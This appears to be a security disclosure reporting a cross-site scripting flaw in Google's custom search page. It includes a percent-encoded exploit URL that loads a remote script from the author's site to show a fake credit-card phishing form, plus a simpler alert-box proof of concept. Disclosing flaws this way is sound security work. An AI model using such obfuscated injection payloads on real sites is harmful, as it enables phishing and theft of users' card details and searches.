Website: www.google.com Description: Google's custom websearch does not prevent javascript from being inserted into the url of the image, allowing malicious users to modify the content of the google page allowing in phishing attacks, or silently steal search terms/results/clicks or modify actual searches to always contain controlled results. With Googles trusted status, the risk is almost certainly high. The exploit is easiest to produce through a custom google search form which are commonly seen, used and understood on the web, but you can also do it through a simple link, this one works in IE: http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27 (This is an example of using the exploit for phishing, it changes the google search page to a page informing the user, that google is now a chargeable service and they should enter their credit card details to continue, these are then logged on my site and the user is returned to a working google - currently there's an confirm box warning the user before the form is submitted.) This example only works in IE, but other UA's also execute the javascript - it being a Google vulnerability, not an IE one. The exploit can be simply demonstrated with, the simpler url: http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!') The exploit has been public for over 2 years, and google have been informed on multiple occasions. More information, and another example exploit at http://jibbering.com/2004/10/google.html Jim Ley. http://jibbering.com/
